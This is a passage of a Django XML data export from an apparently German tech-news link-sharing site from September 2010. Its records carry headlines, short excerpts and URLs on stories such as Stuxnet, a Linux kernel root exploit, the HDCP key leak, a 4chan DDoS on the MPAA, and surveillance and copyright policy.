&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.wegotserved.com/2010/09/20/intel-testing-50-processor-upgrades-point-purchase/</field><field type="FileField" name="page_screenshot">page_shots/2010/09/20/inteltesting50processorupgradesatpointofp.png</field><field type="SlugField" name="slug">inteltesting50processorupgradesatpointofp</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-20 20:35:17</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">intel</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="508" model="submitter.newsentry"><field type="CharField" name="title">Das Web wird schneller mit &lt;script defer&gt;</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://webkit.org/blog/1395/running-scripts-in-webkit/</field><field type="FileField" name="page_screenshot">page_shots/2010/09/19/daswebwirdschnellermitscriptdefer.png</field><field type="SlugField" name="slug">daswebwirdschnellermitscriptdefer</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">14</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-19 21:10:30</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">html javascript web webkit</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="2"></object></field></object><object pk="507" model="submitter.newsentry"><field type="CharField" name="title">Dawkins empfiehlt ThePirateBay</field><field type="TextField" name="excerpt">Weil er mit seiner Dokumentation über Bibelschulen die ganze Welt erreichen will. Er ist ein bekannter “Evolutionist” und hat auch das Wort “Meme” geprägt.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Weil er mit seiner Dokumentation über Bibelschulen die ganze Welt erreichen will. Er ist ein bekannter “Evolutionist” und hat auch das Wort “Meme” geprägt.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://torrentfreak.com/prof-richard-dawkins-advocates-the-use-of-bittorrent-100919/</field><field type="FileField" name="page_screenshot">page_shots/2010/09/19/dawkinsempfiehltthepiratebay.png</field><field type="SlugField" name="slug">dawkinsempfiehltthepiratebay</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">14</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-19 20:58:30</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">bittorrent dawkins evolution</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="506" model="submitter.newsentry"><field type="CharField" name="title">4chan Users Crash MPAA Website in Pro-Piracy Protest</field><field type="TextField" name="excerpt">DoS 4 DoS by 4chan
The 4chan user group “Anonymous” executed attacks this morning that crashed the websites run by the Motion Picture Association of America (MPAA) and Indian tech firm Aiplex Software. The attacks were made in response to anti-piracy measures taken by both organizations.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;DoS 4 DoS by 4chan
&lt;/p&gt;
&lt;p&gt;The 4chan user group “Anonymous” executed attacks this morning that crashed the websites run by the Motion Picture Association of America (MPAA) and Indian tech firm Aiplex Software. The attacks were made in response to anti-piracy measures taken by both organizations.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://mashable.com/2010/09/18/4chan-mpaa-ddos-attack/</field><field type="FileField" name="page_screenshot">page_shots/2010/09/19/4chanuserscrashmpaawebsiteinpro-piracyprote.png</field><field type="SlugField" name="slug">4chanuserscrashmpaawebsiteinpro-piracyprote</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-19 00:10:57</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">4chan mpaa</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="505" model="submitter.newsentry"><field type="CharField" name="title">heise online - Lücke im Linux-Kernel ermöglicht Root-Rechte</field><field type="TextField" name="excerpt">Mal wieder der Umgang mit Sicherheitslücken im LK. local root exploit regression</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Mal wieder der Umgang mit Sicherheitslücken im LK. local root exploit regression
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Luecke-im-Linux-Kernel-ermoeglicht-Root-Rechte-1081195.html</field><field type="FileField" name="page_screenshot">page_shots/2010/09/18/heiseonline-luckeimlinux-kernelermoglichtro.png</field><field type="SlugField" name="slug">heiseonline-luckeimlinux-kernelermoglichtro</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-18 18:59:02</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">exploit linux security</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="504" model="submitter.newsentry"><field type="CharField" name="title">The 6502 Microprocessor Turns 35 &amp;laquo; adafruit industries blog</field><field type="TextField" name="excerpt">The 6502 microprocessor is 35 years old as of September 16th. Introduced in 1975 at WesCon in San Francisco, the chip cost $25. Many early, hugely-popular home computers and gaming consoles sported it, including: Apple 1 &amp; ][; Commodore PET &amp; Vic 20; Atari 2600, 400 &amp; 800.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;The 6502 microprocessor is 35 years old as of September 16th. Introduced in 1975 at WesCon in San Francisco, the chip cost $25. Many early, hugely-popular home computers and gaming consoles sported it, including: Apple 1 &amp;amp; ][; Commodore PET &amp;amp; Vic 20; Atari 2600, 400 &amp;amp; 800.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.adafruit.com/blog/2010/09/17/the-6502-microprocessor-turns-35/</field><field type="FileField" name="page_screenshot">page_shots/2010/09/17/the6502microprocessorturns35laquoadafruit.png</field><field type="SlugField" name="slug">the6502microprocessorturns35laquoadafruit</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-17 23:07:17</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">6502 motorola</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="6"></object></field></object><object pk="503" model="submitter.newsentry"><field type="CharField" name="title">Privacy tool for Iranians withdrawn amid security concerns • The Register</field><field type="TextField" name="excerpt">Haystack sollte die Identität von Internetusern verstecken.
The move came after hacker Jacob Appelbaum called Haystack “the worst piece of software I have ever had the displeasure of ripping apart” </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Haystack sollte die Identität von Internetusern verstecken.
The move came after hacker Jacob Appelbaum called Haystack “the worst piece of software I have ever had the displeasure of ripping apart”
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/09/14/haystack_privacy_debacle/</field><field type="FileField" name="page_screenshot">page_shots/2010/09/17/privacytoolforiranianswithdrawnamidsecurity.png</field><field type="SlugField" name="slug">privacytoolforiranianswithdrawnamidsecurity</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-17 22:54:15</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">haystack privacy</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="502" model="submitter.newsentry"><field type="CharField" name="title">Is Stuxnet the 'best' malware ever?</field><field type="TextField" name="excerpt">Etwas den Stuxnet-Trojaner würdigen. Offensichtlich qualitativ über dem Durchschnitt.
[Fefe](http://blog.fefe.de/?ts=b26cf68e) hat da einiges zu aufgeschrieben.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Etwas den Stuxnet-Trojaner würdigen. Offensichtlich qualitativ über dem Durchschnitt.
&lt;a href="http://blog.fefe.de/?ts=b26cf68e"&gt;Fefe&lt;/a&gt; hat da einiges zu aufgeschrieben.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.computerworld.com/s/article/9185919/Is_Stuxnet_the_best_malware_ever_</field><field type="FileField" name="page_screenshot">page_shots/2010/09/17/stuxnet-malware.png</field><field type="SlugField" name="slug">stuxnet-malware</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-17 22:51:03</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">malware stuxnet trojan</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="501" model="submitter.newsentry"><field type="CharField" name="title">Slashdot Hardware Story | HDCP Master Key Is Legitimate; Blu-ray Is Cracked</field><field type="TextField" name="excerpt">Tja, da will wohl jemand den BlueRay Absatz ankurbeln...</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Tja, da will wohl jemand den BlueRay Absatz ankurbeln...
&lt;/p&gt;</field><field type="CharField" name="external_url">http://hardware.slashdot.org/story/10/09/17/0247246/HDCP-Master-Key-Is-Legitimate-Blu-ray-Is-Cracked</field><field type="FileField" name="page_screenshot">page_shots/2010/09/17/slashdothardwarestoryhdcpmasterkeyislegit.png</field><field type="SlugField" name="slug">slashdothardwarestoryhdcpmasterkeyislegit</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-17 17:25:43</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">blueray</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="500" model="submitter.newsentry"><field type="CharField" name="title">Google engineer accesses teen emails: What&amp;#039;s the damage for Google? | ZDNet </field><field type="TextField" name="excerpt">Google Admin liest Mails mit und belästigt Teenies damit.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Google Admin liest Mails mit und belästigt Teenies damit.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.zdnet.com/blog/google/google-engineer-accesses-teen-emails-whats-the-damage-for-google/2462</field><field type="FileField" name="page_screenshot">page_shots/2010/09/17/googleengineeraccessesteenemailswhat039s.png</field><field type="SlugField" name="slug">googleengineeraccessesteenemailswhat039s</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-17 00:58:44</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">e-mail google spy</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="499" model="submitter.newsentry"><field type="CharField" name="title">Damning Zuckerberg IMs confirmed</field><field type="TextField" name="excerpt">A series of "embarrassing and damaging" IMs from Mark Zuckerberg have been confirmed as real by The New Yorker, and by the Facebook founder himself. Among them, an exchange once leaked to Silicon Alley Insider in which Zuckerberg explains to a friend that his control of Facebook affords him access to any personal information he might care to access on any Harvard student:
"ZUCK: yea so if you ever need info about anyone at harvard
ZUCK: just ask
ZUCK: i have over 4000 emails, pictures, addresses, sns
FRIEND: what!? how'd you manage that one?
ZUCK: people just submitted it
ZUCK: i don't know why
ZUCK: they "trust me"
ZUCK: dumb fucks
...
FRIEND: so have you decided what you are going to do about the websites?
ZUCK: yea i'm going to fuck them
ZUCK: probably in the year
ZUCK: *ear"</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;A series of "embarrassing and damaging" IMs from Mark Zuckerberg have been confirmed as real by The New Yorker, and by the Facebook founder himself. Among them, an exchange once leaked to Silicon Alley Insider in which Zuckerberg explains to a friend that his control of Facebook affords him access to any personal information he might care to access on any Harvard student:
"ZUCK: yea so if you ever need info about anyone at harvard
ZUCK: just ask
ZUCK: i have over 4000 emails, pictures, addresses, sns
FRIEND: what!? how'd you manage that one?
ZUCK: people just submitted it
ZUCK: i don't know why
ZUCK: they "trust me"
ZUCK: dumb fucks
...
FRIEND: so have you decided what you are going to do about the websites?
ZUCK: yea i'm going to fuck them
ZUCK: probably in the year
ZUCK: *ear"
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.newyorker.com/reporting/2010/09/20/100920fa_fact_vargas?currentPage=all</field><field type="FileField" name="page_screenshot">page_shots/2010/09/15/damningzuckerbergimsconfirmed.png</field><field type="SlugField" name="slug">damningzuckerbergimsconfirmed</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-15 14:19:33</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">bürgerrechte facebook privacy privatssphäre</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="7"></object><object pk="10"></object></field></object><object pk="498" model="submitter.newsentry"><field type="CharField" name="title">Is Steve Jobs a Ninja?</field><field type="TextField" name="excerpt">A Japanese magazine, SPA!, claims that Steve Jobs was stopped by airport security last year, even though he was boarding his own plane. According to the report, they objected to a set of ninja stars. From Bloomberg:
"Jobs said it wouldn't make sense for a person to try to hijack his own plane, according to the report. He then told officials he would never visit Japan again, the magazine reported. Apple declined to comment."</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;A Japanese magazine, SPA!, claims that Steve Jobs was stopped by airport security last year, even though he was boarding his own plane. According to the report, they objected to a set of ninja stars. From Bloomberg:
"Jobs said it wouldn't make sense for a person to try to hijack his own plane, according to the report. He then told officials he would never visit Japan again, the magazine reported. Apple declined to comment."
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.bloomberg.com/news/2010-09-14/steve-jobs-stopped-at-japan-airport-over-ninja-stars-spa-says.html</field><field type="FileField" name="page_screenshot">page_shots/2010/09/15/isstevejobsaninja_.png</field><field type="SlugField" name="slug">isstevejobsaninja</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-15 14:17:17</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">airport apple security theater</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="497" model="submitter.newsentry"><field type="CharField" name="title">UK government hands £500M copyright enforcement and censorship tab to nation's Internet users</field><field type="TextField" name="excerpt">One question that wasn't answered by the Act (that would have come out in the debate, if it had happened), is who will pay for this -- the copyright industries, who are the beneficiaries of reduced infringement, or the ISPs, who would then bear the additional costs and have to pass them on to their customers, including the ones who aren't breaching copyright?
Now the UK government has answered the question: the ISP industry and its customers will subsidize multinational record labels and movie companies to the tune of 25 percent of the cost of sending out the letters. The Open Rights Group estimates that this will come out to £500 million in extra costs that all ISP customers will bear.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;One question that wasn't answered by the Act (that would have come out in the debate, if it had happened), is who will pay for this -- the copyright industries, who are the beneficiaries of reduced infringement, or the ISPs, who would then bear the additional costs and have to pass them on to their customers, including the ones who aren't breaching copyright?
&lt;/p&gt;
&lt;p&gt;Now the UK government has answered the question: the ISP industry and its customers will subsidize multinational record labels and movie companies to the tune of 25 percent of the cost of sending out the letters. The Open Rights Group estimates that this will come out to £500 million in extra costs that all ISP customers will bear.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://arstechnica.com/tech-policy/news/2010/09/should-isps-pay-for-p2p-warning-letters-uk-says-yes.ars?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=rss#</field><field type="FileField" name="page_screenshot">page_shots/2010/09/15/ukgovernmenthands500mcopyrightenforcementan.png</field><field type="SlugField" name="slug">ukgovernmenthands500mcopyrightenforcementan</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-15 14:15:24</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">3strikes, contentmafia, copyfight, imaginary property, isp, music, piracy, uk, überwachung</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="496" model="submitter.newsentry"><field type="CharField" name="title">PA Homeland Security gave names of anti-drill activists to drilling company</field><field type="TextField" name="excerpt">Pennsylvania Homeland Security has been spying on anti-drilling activists, taking down names of attendees at meetings and even a screening of a documentary on drilling; these dossiers on peaceful protesters are then supplied to Marcellus Shale, a drilling company. The State Homeland Security Director James Powers justifies the snooping on meetings and information sessions because activists' "presence may spark something else. [I don't want to see public meetings] escalate to physical criminal acts."</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Pennsylvania Homeland Security has been spying on anti-drilling activists, taking down names of attendees at meetings and even a screening of a documentary on drilling; these dossiers on peaceful protesters are then supplied to Marcellus Shale, a drilling company. The State Homeland Security Director James Powers justifies the snooping on meetings and information sessions because activists' "presence may spark something else. [I don't want to see public meetings] escalate to physical criminal acts."
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.centredaily.com/2010/09/14/2206710/documents-show-homeland-security.html</field><field type="FileField" name="page_screenshot">page_shots/2010/09/15/pahomelandsecuritygavenamesofanti-drillacti.png</field><field type="SlugField" name="slug">pahomelandsecuritygavenamesofanti-drillacti</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-15 14:13:36</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">activism dhs polizeistaat überwachung zivilgesellschaft</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="495" model="submitter.newsentry"><field type="CharField" name="title">Piratenpartei veröffentlicht Indect Dokumente</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://www.golem.de/1009/77884.html</field><field type="FileField" name="page_screenshot">page_shots/2010/09/14/piratenparteiveroffentlichtindectdokumente.png</field><field type="SlugField" name="slug">piratenparteiveroffentlichtindectdokumente</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">5</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-14 12:56:31</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">europa indect überwachung</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"></field></object><object pk="494" model="submitter.newsentry"><field type="CharField" name="title">Jean-Luc Godard donates €1K for accused MP3 downloader's defense: "There is no such thing as intellectual property"</field><field type="TextField" name="excerpt">Apparently the great French-Swiss film director Jean-Luc Godard (above) donated a thousand euros toward the legal defense costs of James Climent (inset), a 37-year-old French citizen accused of downloading 13,788 MP3s.
" From what I can make out, Climent was fined 20,000 euros by SACEM and SDRM following lengthy court proceedings.
I am against Hadopi [the French internet-copyright law, or its attendant agency], of course. There is no such thing as intellectual property. I'm against the inheritance [of works], for example. An artist's children could benefit from the copyright of their parents' works, say, until they reach the age of majority... But afterward, it's not clear to me why Ravel's children should get any income from Bolero... "</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Apparently the great French-Swiss film director Jean-Luc Godard (above) donated a thousand euros toward the legal defense costs of James Climent (inset), a 37-year-old French citizen accused of downloading 13,788 MP3s.
" From what I can make out, Climent was fined 20,000 euros by SACEM and SDRM following lengthy court proceedings.
I am against Hadopi [the French internet-copyright law, or its attendant agency], of course. There is no such thing as intellectual property. I'm against the inheritance [of works], for example. An artist's children could benefit from the copyright of their parents' works, say, until they reach the age of majority... But afterward, it's not clear to me why Ravel's children should get any income from Bolero... "
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.ecrans.fr/Jean-Luc-Godard-soutient-un-pirate,10810.html</field><field type="FileField" name="page_screenshot">page_shots/2010/09/14/jean-lucgodarddonates1kforaccusedmp3downlo.png</field><field type="SlugField" name="slug">jean-lucgodarddonates1kforaccusedmp3downlo</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-14 10:08:24</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">bittorrent contentmafia copyfight piracy</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="493" model="submitter.newsentry"><field type="CharField" name="title">HDCP master-key leaks, possible to make unrestricted Blu-Ray recorders</field><field type="TextField" name="excerpt">Engadget reports that the master key that controls HDCP, the anti-copying system used to restrict the outputs of Blu-Ray boxes, set-top boxes, and many game systems, have been compromised and published. With these keys, knowledgeable users can make their own "source" and "sink" keys for devices that permit copying at full resolution -- which means that you should be able to create a hard-drive-based recorder that you can plug into your Blu-Ray player and record shows in real-time. This player would be immune to "revocation" (part of the HDCP specification that allows a cartel of Hollywood studios to remotely disable devices so they won't interoperate with compromised systems -- essentially, the ability to reach into your living room and shut down your equipment).
Apparently there is a cryptographic argument that says that these master keys could be derived from any fifty HDCP devices, but my money is on a plain old leak. Cryptographic keys are tiny pieces of information, and this sort of key would be known to a large number of people: a small, easily conveyed secret known to a lot of people is pretty much doomed. </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Engadget reports that the master key that controls HDCP, the anti-copying system used to restrict the outputs of Blu-Ray boxes, set-top boxes, and many game systems, have been compromised and published. With these keys, knowledgeable users can make their own "source" and "sink" keys for devices that permit copying at full resolution -- which means that you should be able to create a hard-drive-based recorder that you can plug into your Blu-Ray player and record shows in real-time. This player would be immune to "revocation" (part of the HDCP specification that allows a cartel of Hollywood studios to remotely disable devices so they won't interoperate with compromised systems -- essentially, the ability to reach into your living room and shut down your equipment).
&lt;/p&gt;
&lt;p&gt;Apparently there is a cryptographic argument that says that these master keys could be derived from any fifty HDCP devices, but my money is on a plain old leak. Cryptographic keys are tiny pieces of information, and this sort of key would be known to a large number of people: a small, easily conveyed secret known to a lot of people is pretty much doomed.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.engadget.com/2010/09/14/hdcp-master-key-supposedly-released-unlocks-hdtv-copy-protect/</field><field type="FileField" name="page_screenshot">page_shots/2010/09/14/hdcpmaster-keyleakspossibletomakeunrestrict.png</field><field type="SlugField" name="slug">hdcpmaster-keyleakspossibletomakeunrestrict</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-14 09:59:33</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">contentmafia copyfight crypto drm</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="7"></object><object pk="9"></object><object pk="10"></object></field></object><object pk="492" model="submitter.newsentry"><field type="CharField" name="title">Google search index splits with MapReduce • The Register</field><field type="TextField" name="excerpt">Google is moving from MapReduce to GFS2 + BigTableDB</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Google is moving from MapReduce to GFS2 + BigTableDB
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/09/09/google_caffeine_explained/</field><field type="FileField" name="page_screenshot">page_shots/2010/09/14/googlesearchindexsplitswithmapreducethere.png</field><field type="SlugField" name="slug">googlesearchindexsplitswithmapreducethere</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-14 09:29:07</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">google</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="491" model="submitter.newsentry"><field type="CharField" name="title">gulli.com - news - view - Personalausweis: Schüler löschen Chip mit einfachsten Mitteln</field><field type="TextField" name="excerpt">Etwas kritisch diskutieren. Schüler zerkloppen ePerso mit Lötkolben. Mikrowelle wäre evtl. leichter gewesen...</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Etwas kritisch diskutieren. Schüler zerkloppen ePerso mit Lötkolben. Mikrowelle wäre evtl. leichter gewesen...
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.gulli.com/news/personalausweis-sch-ler-l-schen-chip-mit-einfachsten-mitteln-2010-09-13</field><field type="FileField" name="page_screenshot">page_shots/2010/09/14/gullicom-news-view-personalausweisschuler.png</field><field type="SlugField" name="slug">gullicom-news-view-personalausweisschuler</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-14 09:22:16</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">eperso</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="490" model="submitter.newsentry"><field type="CharField" name="title">Auf der Suche nach dem sicheren Datenhafen - heute.de Nachrichten</field><field type="TextField" name="excerpt">Das Safe-Harbor-Abkommen regelt den Datenaustausch zwischen der EU und den USA. US-Unternehmen verpflichten sich darin zu einem strengen Datenschutz. Experten sagen, dass sich kaum ein Unternehmen an die Regeln hält. Eine Kontrolle gibt es nicht.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Das Safe-Harbor-Abkommen regelt den Datenaustausch zwischen der EU und den USA. US-Unternehmen verpflichten sich darin zu einem strengen Datenschutz. Experten sagen, dass sich kaum ein Unternehmen an die Regeln hält. Eine Kontrolle gibt es nicht.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heute.de/ZDFheute/inhalt/8/0,3672,8109320,00.html</field><field type="FileField" name="page_screenshot">page_shots/2010/09/13/aufdersuchenachdemsicherendatenhafen-heute.png</field><field type="SlugField" name="slug">aufdersuchenachdemsicherendatenhafen-heute</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-13 17:36:38</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">biz datenschutz</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="6"></object></field></object><object pk="489" model="submitter.newsentry"><field type="CharField" name="title">Above the Law - Russia Uses Microsoft to Suppress Dissent - NYTimes.com</field><field type="TextField" name="excerpt">Another reason to *not* use FOSS: Putin beschlagnahmt Computer von Typen, die er nicht mag. M$ hetzt deren Anwälte los.
Instead, the group fell victim to one of the authorities newest tactics for quelling dissent: confiscating computers under the pretext of searching for pirated Microsoft software.
Interviews and a review of law enforcement documents show that in recent cases, Microsoft lawyers made statements describing the company as a victim and arguing that criminal charges should be pursued. </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Another reason to &lt;em&gt;not&lt;/em&gt; use FOSS: Putin beschlagnahmt Computer von Typen, die er nicht mag. M$ hetzt deren Anwälte los.
&lt;/p&gt;
&lt;p&gt;Instead, the group fell victim to one of the authorities newest tactics for quelling dissent: confiscating computers under the pretext of searching for pirated Microsoft software.
&lt;/p&gt;
